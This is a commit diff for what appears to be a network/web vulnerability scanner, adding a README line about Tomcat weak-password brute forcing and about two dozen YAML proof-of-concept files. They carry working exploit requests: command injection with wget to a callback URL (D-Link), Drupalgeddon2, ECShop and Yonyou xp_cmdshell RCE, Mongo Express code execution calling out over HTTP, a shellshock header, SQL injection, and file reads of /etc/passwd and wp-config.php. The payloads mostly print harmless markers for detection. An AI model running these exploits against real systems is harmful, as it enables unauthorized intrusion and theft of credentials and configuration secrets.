修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml

README.md

@@ -14,7 +14,7 @@
 因为用习惯了f-scrack，习惯一条命令跑完所有模块，省去一个个模块单独调用的时间，当然我附加了-m 指定模块的功能。
 
 ## 最近更新
-[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml
+[+] 2021/2/25 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml  
 [+] 2021/2/8 增加指纹识别功能,可识别常见CMS、框架,如致远OA、通达OA等。  
 [+] 2021/2/5 修改icmp发包模式,更适合大规模探测。   
 修改报错提示,-debug时,如果10秒内没有新的进展,每隔10秒就会打印一下当前进度    

WebScan/pocs/dlink-cve-2019-16920-rce.yml

@@ -0,0 +1,19 @@
+name: poc-yaml-dlink-cve-2019-16920-rce
+set:
+  reverse: newReverse()
+  reverseURL: reverse.url
+rules:
+  - method: POST
+    path: /apply_sec.cgi
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: >-
+      html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{{reverseURL}}
+    follow_redirects: true
+    expression: |
+      response.status == 200 && reverse.wait(5)
+detail:
+  author: JingLing(https://hackfun.org/)
+  links:
+    - https://www.anquanke.com/post/id/187923
+    - https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3

WebScan/pocs/drupal-cve-2014-3704-sqli.yml

@@ -0,0 +1,14 @@
+name: poc-yaml-drupal-cve-2014-3704-sqli
+rules:
+  - method: POST
+    path: /?q=node&destination=node
+    body: >-
+      pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or
+      updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
+    follow_redirects: false
+    expression: |
+      response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
+detail:
+  Affected Version: "Drupal < 7.32"
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704

WebScan/pocs/drupal-cve-2018-7600-rce.yml

@@ -0,0 +1,39 @@
+name: poc-yaml-drupal-cve-2018-7600-rce
+set:
+  r1: randomLowercase(4)
+  r2: randomLowercase(4)
+groups:
+  drupal8:
+    - method: POST
+      path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}}
+      expression: |
+        response.body.bcontains(bytes(r1 + "%" + r2))
+  drupal7:
+    - method: POST
+      path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password
+      search: |
+        name="form_build_id"\s+value="(?P<build_id>.+?)"
+      expression: |
+        response.status == 200
+    - method: POST
+      path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}"
+      headers:
+        Content-Type: application/x-www-form-urlencoded
+      body: |
+        form_build_id={{build_id}}
+      expression: |
+        response.body.bcontains(bytes(r1 + "%" + r2))
+detail:
+  links:
+    - https://github.com/dreadlocked/Drupalgeddon2
+    - https://paper.seebug.org/567/
+test:
+  target: http://cve-2018-7600-8-x.vulnet:8080/

WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-ecshop-cnvd-2020-58823-sqli
+set:
+  r1: randomInt(40000, 44800)
+rules:
+  - method: POST
+    path: /delete_cart_goods.php
+    body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
+detail:
+  author: 凉风(http://webkiller.cn/)
+  links:
+    - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw

WebScan/pocs/ecshop-rce.yml

@@ -0,0 +1,27 @@
+name: poc-yaml-ecshop-rce
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+groups:
+  2.x:
+    - method: POST
+      path: /user.php
+      headers:
+        Referer: >-
+         554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
+        Content-Type: application/x-www-form-urlencoded
+      body: action=login&pp123=printf({{r1}}*{{r2}});
+      expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+  3.x:
+    - method: POST
+      path: /user.php
+      headers:
+        Referer: >-
+         45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads
+        Content-Type: application/x-www-form-urlencoded
+      body: action=login&pp123=printf({{r1}}*{{r2}});
+      expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  author: 凉风(http://webkiller.cn/)
+  links:
+    - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

WebScan/pocs/jenkins-cve-2018-1000600.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-jenkins-cve-2018-1000600
+set:
+    reverse: newReverse()
+    reverseUrl: reverse.url
+rules:
+    - method: GET
+      path: /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl={{reverseUrl}}
+      expression: |
+        response.status == 200 && reverse.wait(5)
+detail:
+    author: PickledFish(https://github.com/PickledFish)
+    links:
+        - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/

WebScan/pocs/jumpserver-unauth-rce.yml

@@ -0,0 +1,33 @@
+name: poc-yaml-jumpserver-unauth-rce
+set:
+  r1: randomLowercase(5)
+groups:
+  users:
+    - method: GET
+      path: /api/v1/users/connection-token/
+      follow_redirects: false
+      expression: |
+        response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
+    - method: GET
+      path: /api/v1/users/connection-token/?user-only={{r1}}
+      follow_redirects: false
+      expression: |
+        response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
+  authentication:
+    - method: GET
+      path: /api/v1/authentication/connection-token/
+      follow_redirects: false
+      expression: |
+        response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
+    - method: GET
+      path: /api/v1/authentication/connection-token/?user-only={{r1}}
+      follow_redirects: false
+      expression: |
+        response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
+detail:
+  author: mvhz81
+  info: jumpserver unauth read logfile + jumpserver rce
+  links:
+    - https://s.tencent.com/research/bsafe/1228.html
+    - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
+    - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh

WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml

@@ -0,0 +1,12 @@
+name: poc-yaml-lanproxy-cve-2021-3019-lfi
+rules:
+  - method: GET
+    path: "/../conf/config.properties"
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "lanproxy 0.1"
+  links:
+    - https://github.com/ffay/lanproxy/issues/152
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019

WebScan/pocs/laravel-debug-info-leak.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-laravel-debug-info-leak
+rules:
+  - method: POST
+    path: /
+    follow_redirects: false
+    expression: >
+      response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php"))
+detail:
+  author: Dem0ns (https://github.com/dem0ns)
+  links:
+    - https://github.com/dem0ns/improper/tree/master/laravel/5_debug

WebScan/pocs/laravel-improper-webdir.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-laravel-improper-webdir
+rules:
+  - method: GET
+    path: /storage/logs/laravel.log
+    follow_redirects: false
+    expression: >
+      response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace"))
+detail:
+  author: Dem0ns (https://github.com/dem0ns)
+  links:
+    - https://github.com/dem0ns/improper

WebScan/pocs/mongo-express-cve-2019-10758.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-mongo-express-cve-2019-10758
+set:
+  reverse: newReverse()
+  reverseURL: reverse.url
+rules:
+  - method: POST
+    path: /checkValid
+    headers:
+      Authorization: Basic YWRtaW46cGFzcw==
+    body: >-
+      document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}')
+    follow_redirects: true
+    expression: >
+      reverse.wait(5)
+detail:
+  vulnpath: '/checkValid'
+  author: fnmsd(https://github.com/fnmsd)
+  description: 'Mongo Express CVE-2019-10758 Code Execution'
+  links:
+    - https://github.com/masahiro331/CVE-2019-10758
+    - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html

WebScan/pocs/nexus-cve-2020-10199.yml

@@ -0,0 +1,21 @@
+name: poc-yaml-nexus-cve-2020-10199
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+rules:
+  - method: POST
+    path: "/rest/beta/repositories/go/group"
+    headers:
+      Content-Type: application/json
+    body: |
+      {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}}
+    expression: |
+      response.status == 400 && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  Affected Version: "nexus<3.21.2"
+  author: kingkk(https://www.kingkk.com/)
+  links:
+    - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
+    - https://www.cnblogs.com/magic-zero/p/12641068.html
+    - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
+    - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

WebScan/pocs/nexus-cve-2020-10204.yml

@@ -0,0 +1,20 @@
+name: poc-yaml-nexus-cve-2020-10204
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+rules:
+  - method: POST
+    path: "/extdirect"
+    headers:
+      Content-Type: application/json
+    body: |
+      {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28}
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  Affected Version: "nexus<3.21.2"
+  author: kingkk(https://www.kingkk.com/)
+  links:
+    - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
+    - https://www.cnblogs.com/magic-zero/p/12641068.html
+    - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

WebScan/pocs/nexus-default-password.yml

@@ -0,0 +1,22 @@
+name: poc-yaml-nexus-default-password
+rules:
+  - method: GET
+    path: /nexus/service/siesta/capabilities
+    expression: >
+      response.status == 401
+  - method: GET
+    path: /nexus/service/local/authentication/login
+    headers:
+      Accept: application/json
+      Authorization: Basic YWRtaW46YWRtaW4xMjM=
+    expression: >
+      response.status == 200
+  - method: GET
+    path: /nexus/service/siesta/capabilities
+    expression: >
+      response.status == 200
+detail:
+  author: Soveless(https://github.com/Soveless)
+  Affected Version: "Nexus Repository Manager OSS"
+  links:
+    - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager

WebScan/pocs/phpmyadmin-setup-deserialization.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-phpmyadmin-setup-deserialization
+rules:
+  - method: POST
+    path: /scripts/setup.php
+    body: >-
+      action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
+    follow_redirects: false
+    expression: >-
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: p0wd3r
+  links:
+    - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

WebScan/pocs/seeyon-ajax-unauthorized-access.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-seeyon-ajax-unauthorized-access
+rules:
+  - method: GET
+    path: /seeyon/thirdpartyController.do.css/..;/ajax.do
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
+  - method: GET
+    path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
+
+detail:
+  author: x1n9Qi8
+  links:
+    - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
+    - https://buaq.net/go-53721.html

WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-seeyon-cnvd-2020-62422-readfile
+rules:
+  - method: GET
+    path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
+    follow_redirects: false
+    expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
+detail:
+  author: Aquilao(https://github.com/Aquilao)
+  info: seeyon readfile(CNVD-2020-62422)
+  links:
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422

WebScan/pocs/sonicwall-ssl-vpn-rce.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-sonicwall-ssl-vpn-rce
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(1140000, 1144800)
+rules:
+  - method: GET
+    path: /cgi-bin/jarrewrite.sh
+    follow_redirects: false
+    headers:
+      X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
+detail:
+  author: sharecast
+  links:
+    - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

WebScan/pocs/springboot-env-unauth.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-springboot-env-unauth
+groups:
+  spring1:
+    - method: GET
+      path: /env
+      expression: |
+        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
+  spring2:
+    - method: GET
+      path: /actuator/env
+      expression: |
+        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
+detail:
+  links:
+    - https://github.com/LandGrey/SpringBootVulExploit

WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml

@@ -0,0 +1,18 @@
+name: poc-yaml-vmware-vcenter-arbitrary-file-read
+groups:
+  win:
+    - method: GET
+      path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
+      follow_redirects: false
+      expression: |
+        response.status == 200 && response.body.bcontains(b"org.postgresql.Driver")
+  linux:
+    - method: GET
+      path: /eam/vib?id=/etc/passwd
+      follow_redirects: false
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: MrP01ntSun(https://github.com/MrPointSun)
+  links:
+    - https://t.co/LfvbyBUhF5

WebScan/pocs/vmware-vcenter-unauthorized-rce-cve-2021-21972.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-vmware-vcenter-unauthorized-rce-cve-2021-21972
+rules:
+  - method: GET
+    path: /ui/vropspluginui/rest/services/uploadova
+    follow_redirects: false
+    expression: |
+      response.status == 405 && response.body.bcontains(b"Method Not Allowed")
+  - method: GET
+    path: /ui/vropspluginui/rest/services/getstatus
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"States") && response.body.bcontains(b"Install Progress")
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://swarm.ptsecurity.com/unauth-rce-vmware/

WebScan/pocs/wordpress-cve-2019-19985-infoleak.yml

@@ -0,0 +1,11 @@
+name: poc-yaml-wordpress-cve-2019-19985-infoleak
+rules:
+  - method: GET
+    path: "/wp-admin/admin.php?page=download_report&report=users&status=all"
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"Name,Email,Status,Created") && "(?i)filename=.*?.csv".bmatches(bytes(response.headers["Content-Disposition"]))
+detail:
+  author: bufsnake(https://github.com/bufsnake)
+  links:
+    - https://www.exploit-db.com/exploits/48698

WebScan/pocs/wordpress-ext-adaptive-images-lfi.yml

@@ -0,0 +1,13 @@
+name: poc-yaml-wordpress-ext-adaptive-images-lfi
+rules:
+  - method: GET
+    path: >-
+      /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
+    follow_redirects: false
+    expression: >
+      response.status == 200 && response.body.bcontains(b"DB_NAME") && response.body.bcontains(b"DB_USER") && response.body.bcontains(b"DB_PASSWORD") && response.body.bcontains(b"DB_HOST")
+detail:
+  author: FiveAourThe(https://github.com/FiveAourThe)
+  links:
+    - https://www.anquanke.com/vul/id/1674598
+    - https://github.com/security-kma/EXPLOITING-CVE-2019-14205

WebScan/pocs/wordpress-ext-mailpress-rce.yml

@@ -0,0 +1,23 @@
+name: poc-yaml-wordpress-ext-mailpress-rce
+set:
+  r: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000, 1000000000)
+rules:
+  - method: POST
+    path: "/wp-content/plugins/mailpress/mp-includes/action.php"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php echo {{r}}%2b{{r1}};?>&html=&plaintext=&mail_format=standard&autosave=1
+    expression: "true"
+    search: |
+      <autosave id='(?P<id>.+?)'
+  - method: GET
+    path: "/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id={{id}}"
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r + r1)))
+
+detail:
+  author: violin
+  links:
+    - https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

WebScan/pocs/yonyou-grp-u8-sqli-to-rce.yml

@@ -0,0 +1,16 @@
+name: poc-yaml-yonyou-grp-u8-sqli-to-rce
+set:
+  r1: randomInt(1000, 9999)
+  r2: randomInt(1000, 9999)
+rules:
+  - method: POST
+    path: /Proxy
+    follow_redirects: false
+    body: |
+      cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'set/A {{r1}}*{{r2}}'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  author: MrP01ntSun(https://github.com/MrPointSun)
+  links:
+    - https://www.hackbug.net/archives/111.html

WebScan/pocs/yonyou-grp-u8-sqli.yml

@@ -0,0 +1,15 @@
+name: poc-yaml-yonyou-grp-u8-sqli
+set:
+  r1: randomInt(40000, 44800)
+  r2: randomInt(40000, 44800)
+rules:
+  - method: POST
+    path: /Proxy
+    body: >
+      cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{r1}}%2a{{r2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
+detail:
+  author: 凉风(http://webkiller.cn/)
+  links:
+    - https://www.hacking8.com/bug-web/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B-GRP-u8%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html